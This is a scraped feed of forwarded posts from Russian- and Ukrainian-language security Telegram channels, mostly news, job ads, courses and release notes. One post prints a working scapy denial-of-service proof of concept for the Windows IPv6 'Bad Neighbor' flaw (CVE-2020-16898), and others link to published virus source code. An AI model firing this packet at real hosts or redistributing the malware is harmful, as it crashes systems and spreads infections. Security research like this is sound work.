Forwarded from TechMaker
Вже скоро у продажу наш сніфер для аналізу та реверсу CANbus автомобілів, мотоциклів, UAV та інших пристроїв.
Особливості:
- одночасний аналіз двох CAN шин через єдиний type-C usb.
- сумісний з усіма існуючими open-source інструментами, нативно підтримується ядром Linux.
- має вдосталь потужності для реалізації власних сценаріїв прямо в мізках сніфера
- інтегровані термінатори (резистори між CANH-CANL) CAN шини. Два перемикачі двозволяють підключити їх до двох шин окремо, у разі необхідності
Особливості:
- одночасний аналіз двох CAN шин через єдиний type-C usb.
- сумісний з усіма існуючими open-source інструментами, нативно підтримується ядром Linux.
- має вдосталь потужності для реалізації власних сценаріїв прямо в мізках сніфера
- інтегровані термінатори (резистори між CANH-CANL) CAN шини. Два перемикачі двозволяють підключити їх до двох шин окремо, у разі необхідності
Forwarded from Noise Security Bit (AM)
CVE-2020-16898 – Exploiting RCE "Bad Neighbor" vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
http://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
http://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
from scapy.all import *
v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"
p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4
c = ICMPv6NDOptEFA();
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt
l=fragment6(p_test_frag, 200)
for p in l:
send(p)
Quarkslab
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898) - Quarkslab's…
This blog post analyzes the vulnerability known as "Bad Neighbor" or CVE-2020-16898, a stack-based buffer overflow in the IPv6 stack of Windows, which can be remotely triggered by means of a malformed Router Advertisement packet.
Forwarded from Noise Security Bit (AM)
Найдено несколько уязвимостей в Jitsi Meet:
- Arbitrary Client Remote Code Execution (CVE-2020-27162)
- Limited Certificate Validation Bypass (CVE-2020-27161)
https://research.nccgroup.com/2020/10/23/technical-advisory-jitsi-meet-electron-arbitrary-client-remote-code-execution-cve-2020-27162/
- Arbitrary Client Remote Code Execution (CVE-2020-27162)
- Limited Certificate Validation Bypass (CVE-2020-27161)
https://research.nccgroup.com/2020/10/23/technical-advisory-jitsi-meet-electron-arbitrary-client-remote-code-execution-cve-2020-27162/
Nccgroup
Cyber Security Research
Cutting-edge cyber security research from NCC Group. Find public reports, technical advisories, analyses, & other novel insights from our global experts.
Forwarded from DC8044 F33d
В рубрике проверенных вакансий у нас сегодня агонь предложение. Молодая компания OCTAL уверенно пробивается в лидеры рынка пентеста и по фидбекам людей, которые в ней работают, является несомненным топчиком как работодатель по урвню организации процессов и комфорту работы. Присоединяйтесь к возможно лучшей сайберсек тиме в наших краях!
Check out this job at OCTAL: Penetration Tester https://www.linkedin.com/jobs/view/2240951441
Check out this job at OCTAL: Penetration Tester https://www.linkedin.com/jobs/view/2240951441
Linkedin
OCTAL hiring Penetration Tester in Kyiv, Kyiv City, Ukraine | LinkedIn
Posted 9:00:09 AM. Our work focuses on network, web, and mobile application security assessments with a diversified…See this and similar jobs on LinkedIn.
Forwarded from SecurityLab.ru (Pipiggi)
Мы часто слышим о том, что мир стоит на пороге технологической революции, которая изменит нашу жизнь к лучшему. Однако этого пока не произошло. Напротив, мы наблюдаем риски всеобщей цифровизации: вся жизнь современного общества построена вокруг технологий, а кибератаки могут поставить под удар нормальное функционирование городов или привести к настоящей техногенной катастрофе. Вариантом дальнейшего существования в таких условиях может стать предварительное моделирование угроз для критически важной инфраструктуры без последствий в реальном мире.
Речь идет о киберучениях – проведении контролируемых атак с целью проверки и улучшения навыков служб ИБ по обнаружению киберугроз и реагированию на них. Positive Technologies проводит опрос среди российских специалистов по информационной безопасности, чтобы выяснить, насколько востребованы российским бизнесом киберучения.
Пожалуйста ответьте на несколько вопросов: https://ru.research.net/r/MSB7VPS . Все данные будут использованы в обезличенном виде, а итоговый материал будет опубликован на сайте Positive Technologies.
Речь идет о киберучениях – проведении контролируемых атак с целью проверки и улучшения навыков служб ИБ по обнаружению киберугроз и реагированию на них. Positive Technologies проводит опрос среди российских специалистов по информационной безопасности, чтобы выяснить, насколько востребованы российским бизнесом киберучения.
Пожалуйста ответьте на несколько вопросов: https://ru.research.net/r/MSB7VPS . Все данные будут использованы в обезличенном виде, а итоговый материал будет опубликован на сайте Positive Technologies.
Forwarded from [Kryacked🐥] Cybersecurity hands-on
Telegraph
EY Cyber Consulting Bootcamp
Цікавишся ІТ і хочеш спробувати себе в ІТ-консалтингу? EY розпочинає унікальний проєкт EY Cyber Consulting Bootcamp😍 EY Cyber Consulting Bootcamp – це: ✔️П’ять тижнів інсайтів від консультантів напряму управління інформаційними технологіями та IT-ризиками…
Forwarded from Codeby
ASM – техники из старого сундука
Есть поговорка: "Программистами не рождаются – ими умирают". Исходя из этой парадигмы можно сделать вывод, что за долгий свой/программерский путь, у каждого из нас снежным комом накапливаются различные техники и алгоритмы, поделиться с общественностью которыми было-бы не грех. К примеру на этапе моего начинания, мир процессора для меня был так юн, что некоторые вещи не приобрели ещё свои имена и приходилось указывать на них пальцем. Позже, все просветления было решено записывать в блокнот, который постепенно разбух до увесистого романа. Фильтр элементарных заметок сделал своё дело и на данный момент в этом блокноте осталось ~1000 строк, которые я и решил сбросить сюда с краткими комментариями. Надеюсь у топика найдутся свои "евангелисты" и кто-нибудь почерпнёт с него что-то полезное.
Читать: https://codeby.net/threads/asm-texniki-iz-starogo-sunduka.75535/
#asm #cpuid #marylin
————————————————
Фриланс Кодебай — сервис поиска удаленной работы и размещения заказов
Есть поговорка: "Программистами не рождаются – ими умирают". Исходя из этой парадигмы можно сделать вывод, что за долгий свой/программерский путь, у каждого из нас снежным комом накапливаются различные техники и алгоритмы, поделиться с общественностью которыми было-бы не грех. К примеру на этапе моего начинания, мир процессора для меня был так юн, что некоторые вещи не приобрели ещё свои имена и приходилось указывать на них пальцем. Позже, все просветления было решено записывать в блокнот, который постепенно разбух до увесистого романа. Фильтр элементарных заметок сделал своё дело и на данный момент в этом блокноте осталось ~1000 строк, которые я и решил сбросить сюда с краткими комментариями. Надеюсь у топика найдутся свои "евангелисты" и кто-нибудь почерпнёт с него что-то полезное.
Читать: https://codeby.net/threads/asm-texniki-iz-starogo-sunduka.75535/
#asm #cpuid #marylin
————————————————
Фриланс Кодебай — сервис поиска удаленной работы и размещения заказов
Forwarded from road to OSCP
YouTube
005.Безопасность бинарных приложений" - Андрей Ковалев
Поговорим о безопасности компилируемых приложений. В частности, рассмотрим уязвимости, связанные с порчей памяти (out of bound, use after free, type confusion), а также компенсационные технические меры, которые применяются в современных компиляторах для снижения…
Forwarded from CTF в формате шоу (Nikita Sychev)
Организаторы VolgaCTF зовут всех на онлайн мастер-классы по линуксу, сетям и CTF для начинающих
1–8 ноября
Онлайн
Программа: https://t.me/volgactf/167
Регистрация: https://forms.gle/X6eFNkpY4QyNZUwq9
1–8 ноября
Онлайн
Программа: https://t.me/volgactf/167
Регистрация: https://forms.gle/X6eFNkpY4QyNZUwq9
Telegram
VolgaCTF
🤓Быть умным и много знать – хорошо и прибыльно. Мы тебе в этом поможем!
С 1 ноября команда движения волонтеров цифрового развития Самарской области запускает онлайн-лекции! Конечно, не без нашего участия.
Для кого: для всех, кто хочет в технологии, но…
С 1 ноября команда движения волонтеров цифрового развития Самарской области запускает онлайн-лекции! Конечно, не без нашего участия.
Для кого: для всех, кто хочет в технологии, но…
Forwarded from vx-underground
image_2020-11-01_14-59-33.png
21 KB
Мы представляем вам Cheshire от bot! Это первый полнофункциональный Java bytecode вирус, со времен вируса Strangebrew, выпущенного еще в 2001 году.
https://github.com/vxunderground/MalwareSourceCode/tree/main/Java/Virus.Java.Cheshire.a
https://github.com/vxunderground/MalwareSourceCode/tree/main/Java/Virus.Java.Cheshire.a
Forwarded from Russian OSINT
Киберкомандование США вместе с CISA и ФБР поздравляет российских государственных хакеров с Хеллоуином!
По заявлению Киберкомандования США, ими было обнаружило восемь новых образцов вредоносного ПО, которые разработаны и развернуты российскими хакерами в ходе недавних атак.
Шесть из восьми образцов относятся к вредоносному ПО ComRAT (используется хакерской группой Turla), а два других являются образцами вредоносного ПО Zebrocy (используется хакерской группой APT28).
Первые жертвы этих вредоносных программ выявлены в Восточной Европе и Центральной Азии.
По заявлению ZDnet, цель правительства США - поделиться последними версиями этих хакерских инструментов с широкой публикой, чтобы системные администраторы и другие защитники обновили меры защиты.
https://www.virustotal.com/en/user/CYBERCOM_Malware_Alert/
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a
И обязательный атрибут в конце любой статьи про русских хакеров это медведь, жаль без водки и закуски!
По заявлению Киберкомандования США, ими было обнаружило восемь новых образцов вредоносного ПО, которые разработаны и развернуты российскими хакерами в ходе недавних атак.
Шесть из восьми образцов относятся к вредоносному ПО ComRAT (используется хакерской группой Turla), а два других являются образцами вредоносного ПО Zebrocy (используется хакерской группой APT28).
Первые жертвы этих вредоносных программ выявлены в Восточной Европе и Центральной Азии.
По заявлению ZDnet, цель правительства США - поделиться последними версиями этих хакерских инструментов с широкой публикой, чтобы системные администраторы и другие защитники обновили меры защиты.
https://www.virustotal.com/en/user/CYBERCOM_Malware_Alert/
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a
И обязательный атрибут в конце любой статьи про русских хакеров это медведь, жаль без водки и закуски!
Forwarded from SecurityLab.ru (SecurityLab news)
В условиях массового перехода на удаленный режим работы 51% компаний в мире и 42% в России намерены расширить штат специалистов в области кибербезопасности. В связи с этим уже к следующему году компании могут столкнуться с дефицитом ИБ-специалистов. Об этом говорится в исследовании компании PwC.
https://www.securitylab.ru/news/513650.php
https://www.securitylab.ru/news/513650.php
t.me
К 2021 году из-за удаленки возникнет дефицит ИБ-специалистов по всему миру
В условиях пандемии COVID-19 многим организациям пришлось пересмотреть и переосмыслить стратегии обеспечения кибербезопасности.
Forwarded from Inside
Kali Linux
Kali Linux 2020.4 Release (ZSH, Bash, CME, MOTD, AWS, Docs, Win-KeX & Vagrant)
We find ourselves in the 4th quarter of 2020, and we are ecstatic to announce the release of Kali Linux 2020.4, which is ready for immediate download or updating. What’s different with this release since 2020.3 in August 2020 is: ZSH is the new default shell…
Forwarded from novitoll_ch (novitoll)
CVE-2020-12352. Продолжаю работу над эксплойтом по лику стэка структуры
struct a2mp_info_rsp. Чет пока что хз как это использовать, но есть идеи. Так как, там структура __packed получается такие байты при лике.Forwarded from Order of Six Angles
Я нашел и отдебажил один образец шифровальщика Hermes, который прекращает работу, если язык украинский или белорусский, но не русский (423 - белорусский, 422 - украинский), что тоже странно) Или забыли, или убрали хз
это к https://t.me/OrderOfSixAngles/897
это к https://t.me/OrderOfSixAngles/897
Forwarded from vx-underground
У нас для вас еще один подгон - Linux.Kropotkine.
Этот 64 битный ELF вирус назван в честь Петра Кропо́ткина - русского революционера-анархиста.
Авторы: S01den, sblip
https://github.com/vxunderground/MalwareSourceCode/blob/main/Linux/Linux.Kropotkine.asm
Этот 64 битный ELF вирус назван в честь Петра Кропо́ткина - русского революционера-анархиста.
Авторы: S01den, sblip
https://github.com/vxunderground/MalwareSourceCode/blob/main/Linux/Linux.Kropotkine.asm
Forwarded from CyberPeople
Курс для прокачки 💪
https://cyberschool.tech/courses/cisco-cybersecurity-deep-learning-course
https://cyberschool.tech/courses/cisco-cybersecurity-deep-learning-course
Forwarded from Заметки Хакер
📜 Искусство форензики
✏️ Неплохая вводная статья с пачкой ссылок, утилит и основами расследования
Архив всех отобранных статей
✏️ Неплохая вводная статья с пачкой ссылок, утилит и основами расследования
Архив всех отобранных статей
Forwarded from Udemy4U - Free Udemy Courses
Linux for Network Engineers: Practical Linux with GNS3
Linux for Networking Engineers (CCNA, CCNP, CCIE etc). Practical Linux with GNS3 = network programmability & automation
22 sections • 125 lectures • 13h 11m total length
FREE for 2 days
Rating: 4.7 (2,230 ratings)
https://www.udemy.com/course/linux-for-network-engineers-practical-linux-with-gns3/?couponCode=THANKSGIVING
Linux for Networking Engineers (CCNA, CCNP, CCIE etc). Practical Linux with GNS3 = network programmability & automation
22 sections • 125 lectures • 13h 11m total length
FREE for 2 days
Rating: 4.7 (2,230 ratings)
https://www.udemy.com/course/linux-for-network-engineers-practical-linux-with-gns3/?couponCode=THANKSGIVING
Udemy
Linux for Network Engineers: Practical Linux with GNS3
<p>It is important for you as a network engineer to learn Linux!</p>
<p>Why? There are many reasons including:</p>
<p>1) A lot of network operating systems are based on Linux, or have a Linux shell you can access, or use Linux type commands. I'll…
<p>Why? There are many reasons including:</p>
<p>1) A lot of network operating systems are based on Linux, or have a Linux shell you can access, or use Linux type commands. I'll…